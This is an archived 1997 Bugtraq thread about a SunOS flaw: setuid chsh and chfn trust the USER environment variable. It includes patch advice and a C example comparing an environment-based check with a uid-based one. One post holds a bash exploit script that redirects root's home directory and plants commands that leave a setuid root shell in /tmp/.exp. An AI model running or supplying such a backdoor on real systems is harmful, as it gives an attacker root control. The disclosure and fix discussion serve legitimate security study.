Bugtraq mailing list archives

Interim solution for ps


From: blind () SEDATED NET (Trevor Linton)
Date: Mon, 19 May 1997 07:19:31 +0000


Here's a rough script to get root; this is more of an algorithm
than a working script, but in "theory" it will work.  This will work
if chsh and chfn are +s'ed, and if they use getenv.

------ CUT ------
#!/bin/bash
#
#  Very basic, i need a way to set root shell to /tmp/.tmp
#  chfn on some systems will set the directory on some it wont.
#  depends.. :\
#
#  patch:
#    1) -s both chfn and chsh
#    2) edit the source code for chfn and chsh and remove
#       getenv("LOGNAME") and or getenv("USER") and replace
#       with getuid(); ..
#
mkdir -f /tmp/.tmp
export USER="root"
export LOGNAME="root"
echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp
chfn
echo "Set the SHELL TO /bin/bash!"
chsh
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile
echo "Exploit set, wait a day then log back on and execute"
echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when"
echo "root logs in it'll be +s'ed"
-----------------

blind - blind () root hax0r org support () hax0r org
Swingin' Utters. a juvenile product of the working class.


On Mon, 19 May 1997, Nick Simicich wrote:

Of course, if Bash was changed, I could change them from perl, or a C
program, and then run bash out of my C program or Perl.

You were right the first time - don't trust your environment unless you
control it.

On Sun, 18 May 1997, Trevor Linton wrote:

Date: Sun, 18 May 1997 13:36:00 +0000
From: Trevor Linton <blind () SEDATED NET>
To: best-of-security () suburbia net
Subject: BoS:      SunOS exploit.
Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST)
Resent-From: best-of-security () suburbia net


On sunos, if you execute a clean bash shell then type, export USER="root"
then USER=$LOGNAME, then execute chsh root or chfn root you can change
the root information.

 Why?

 Well first off, chsh and chfn are +s'ed.  This is a bad idea in the first
place.  Second off, chsh and chfn use the function getenv("USER"); most
programs bother to use this instead of geteuid().  getenv("USER") reports
that the user is root (while geteuid() would report the real userid), and
then, since chsh and/or chfn is +s'ed, it'll change root's shell user
information or ANYONE on the system's information!

 On the SunOS system I have, I've been able to lock out ANYONE'S shell
using this exploit, locking out root's shell as well as changing
anyone's NAME info in /etc/passwd etc.. etc..  Any program that uses
getenv("USER") is vulnerable (that's in bash).  tcsh and some other
shells I remember don't allow USER and LOGNAME modifying. :\

 Anyways here's a rough patch:
        1) -s the programs that use getenv(); such as chsh and chfn
        2) remove getenv() and replace it with geteuid();
        3) possibly get the programmers of bash to fix it so USER and
           LOGNAME can't be modified unless it's super-user.

I'm sure there's a way to get root from this exploit butta.. :) oh well.

Trevor Linton (blind) - blind () sedated net support () hax0r org
Swingin' Utters. a juvenile product of the working class.

"People who are having trouble communicating should just shuttup"


Of course my password is the same as my pet's name.
My macaw's name was Q47pY!3, but I change it every 90 days.
Nick Simicich mailto:njs () scifi squawk com or (last choice) mailto:njs () us ibm com
http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
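The following is an added example, not code from this thread or from any chsh/chfn implementation; the helper names are hypothetical. It puts the decision the thread criticises (trusting a caller-supplied USER string) beside the fix the thread proposes (deciding from the kernel-reported uid), and notes why a +s binary must use getuid() rather than geteuid():

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Added example. A setuid chsh/chfn has to answer "may the caller edit this
 * account?". The bug in the thread: the answer is derived from getenv("USER"),
 * which the caller fully controls (export USER="root" in bash). */

/* Unsafe pattern: identity taken from an environment string. Since the
 * caller sets USER/LOGNAME, "root" can simply be claimed. */
int may_modify_by_env_name(const char *claimed_user, const char *target_user)
{
    if (claimed_user == NULL)
        return 0;
    return strcmp(claimed_user, "root") == 0 ||
           strcmp(claimed_user, target_user) == 0;
}

/* Safe pattern: identity is the real uid the kernel reports. It must be
 * getuid(), not geteuid(): inside a +s root binary the effective uid is 0
 * for every caller, so geteuid() would "prove" everyone is root. */
int may_modify_by_uid(uid_t caller_real_uid, uid_t target_uid)
{
    return caller_real_uid == 0 || caller_real_uid == target_uid;
}

/* What a hardened chfn/chsh would call: decide from the kernel-reported uid. */
int caller_may_modify(uid_t target_uid)
{
    return may_modify_by_uid(getuid(), target_uid);
}

int main(void)
{
    const char *env_user = getenv("USER");      /* attacker-controlled input */
    uid_t root_uid = 0;                         /* target account: root */

    printf("env-based check, target root: %s\n",
           may_modify_by_env_name(env_user, "root") ? "ALLOWED" : "denied");
    printf("uid-based check, target root: %s (real uid %u)\n",
           caller_may_modify(root_uid) ? "ALLOWED" : "denied",
           (unsigned)getuid());
    return 0;
}
```

Run once normally and once after `export USER=root` as an unprivileged user: the env-based line flips to ALLOWED, the uid-based line does not.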